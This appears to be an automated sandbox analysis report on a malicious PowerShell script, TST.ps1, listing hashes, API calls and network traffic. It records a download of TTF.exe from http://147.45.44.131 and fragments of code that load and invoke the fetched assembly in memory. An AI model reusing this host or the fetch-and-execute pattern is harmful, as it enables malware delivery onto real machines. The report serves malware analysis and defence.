Summary | ZeroBOX

TST.ps1

Generic Malware Antivirus
Category: FILE
Machine: s1_win7_x6403_us
Started: Aug. 13, 2024, 9:33 a.m.
Completed: Aug. 13, 2024, 9:35 a.m.
Size 4.8KB
Type ASCII text, with very long lines, with CRLF line terminators
MD5 34261ad4c802d025f6ead9dd56634860
SHA256 27bd8666cfbd715fe61a6b97294c7f4f6b15e61aefc65ebe91a77e4d5c8e74fa
CRC32 9E29F94A
ssdeep 96:aZmxGUY5oPhvPFUY/D4hvPwDyDXhvPSu9IR9IX:w2B7D4BIDyDXBKasO
Yara None matched

Hosts (Name / Response / Post-Analysis Lookup): No hosts contacted.
IP Address: 147.45.44.131   Status: Active   Action: Moloch

Time & API Arguments Status Return Repeated

GetComputerNameW

computer_name: TEST22-PC
1 1 0
Time & API Arguments Status Return Repeated

WriteConsoleW

buffer: Exception calling "Load" with "1" argument(s): "Could not load file or assembly
console_handle: 0x00000023
1 1 0

WriteConsoleW

buffer: '13312 bytes loaded from System.Management.Automation, Version=1.0.0.0, Cultur
console_handle: 0x0000002f
1 1 0

WriteConsoleW

buffer: e=neutral, PublicKeyToken=31bf3856ad364e35' or one of its dependencies. An atte
console_handle: 0x0000003b
1 1 0

WriteConsoleW

buffer: mpt was made to load a program with an incorrect format."
console_handle: 0x00000047
1 1 0

WriteConsoleW

buffer: At line:7 char:47
console_handle: 0x00000053
1 1 0

WriteConsoleW

buffer: + $assembly = [System.Reflection.Assembly]::Load <<<< ($fileBytes)
console_handle: 0x0000005f
1 1 0

WriteConsoleW

buffer: + CategoryInfo : NotSpecified: (:) [], MethodInvocationException
console_handle: 0x0000006b
1 1 0

WriteConsoleW

buffer: + FullyQualifiedErrorId : DotNetMethodException
console_handle: 0x00000077
1 1 0

WriteConsoleW

buffer: You cannot call a method on a null-valued expression.
console_handle: 0x00000017
1 1 0

WriteConsoleW

buffer: At line:13 char:19
console_handle: 0x0000002f
1 1 0

WriteConsoleW

buffer: + $entryPoint.Invoke <<<< ($null, $params)
console_handle: 0x0000003b
1 1 0

WriteConsoleW

buffer: + CategoryInfo : InvalidOperation: (Invoke:String) [], RuntimeExc
console_handle: 0x00000047
1 1 0

WriteConsoleW

buffer: eption
console_handle: 0x00000053
1 1 0

WriteConsoleW

buffer: + FullyQualifiedErrorId : InvokeMethodOnNull
console_handle: 0x0000005f
1 1 0
Time & API Arguments Status Return Repeated

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x007206a8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 8
1 1 0

CryptExportKey

buffer: f ›týðKlV«×C€®¯Ë²ÙŽ¾Ý0íCªåí„
crypto_handle: 0x007206a8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 8
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00720828
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00720828
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00720828
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00720828
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00720828
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00720828
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0
Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

1 1 0
suspicious_features: GET method with no useragent header, Connection to IP address
suspicious_request: GET http://147.45.44.131/files/TTF.exe
request GET http://147.45.44.131/files/TTF.exe
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

process_identifier: 1648
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x023eb000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1648
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x023ff000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1648
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x01fb9000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1648
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05ec0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1648
region_size: 327680
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x7ef40000
allocation_type: 1056768 (MEM_RESERVE|MEM_TOP_DOWN)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1648
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x7ef40000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1648
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x7ef40000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1648
region_size: 65536
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x7ef30000
allocation_type: 1056768 (MEM_RESERVE|MEM_TOP_DOWN)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1648
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x7ef30000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1648
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05ec1000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1648
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05ed0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1648
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026e2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1648
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026e3000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1648
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x023f9000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1648
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05256000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1648
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05257000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1648
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05ec2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1648
region_size: 1114112
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x06400000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1648
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x064d0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1648
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x064d1000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1648
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x064d2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1648
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x064d3000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1648
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x064d4000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1648
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05ec3000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1648
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05ec4000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1648
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05ec5000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1648
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05ec6000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1648
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05258000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1648
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05ec7000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1648
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05241000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1648
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05ed1000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0
Time & API Arguments Status Return Repeated

GetAdaptersAddresses

flags: 15
family: 0
111 0
Data received HTTP/1.1 200 OK Date: Tue, 13 Aug 2024 00:33:33 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Mon, 12 Aug 2024 11:56:41 GMT ETag: "3400-61f7b2fb281f0" Accept-Ranges: bytes Content-Length: 13312 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/x-msdos-program [binary body: PE executable beginning with an MZ header and "This program cannot be run in DOS mode.", sections .text, .rsrc, .reloc; non-printable bytes omitted]
Data received
Data sent GET /files/TTF.exe HTTP/1.1 Host: 147.45.44.131 Connection: Keep-Alive
host 147.45.44.131
Time & API Arguments Status Return Repeated

send

buffer: GET /files/TTF.exe HTTP/1.1 Host: 147.45.44.131 Connection: Keep-Alive
socket: 1544
sent: 76
1 76 0
Time & API Arguments Status Return Repeated

recv

buffer: HTTP/1.1 200 OK Date: Tue, 13 Aug 2024 00:33:33 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Mon, 12 Aug 2024 11:56:41 GMT ETag: "3400-61f7b2fb281f0" Accept-Ranges: bytes Content-Length: 13312 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/x-msdos-program [binary body: PE executable beginning with an MZ header and "This program cannot be run in DOS mode.", sections .text, .rsrc, .reloc; non-printable bytes omitted]
received: 2720
socket: 1544
1 2720 0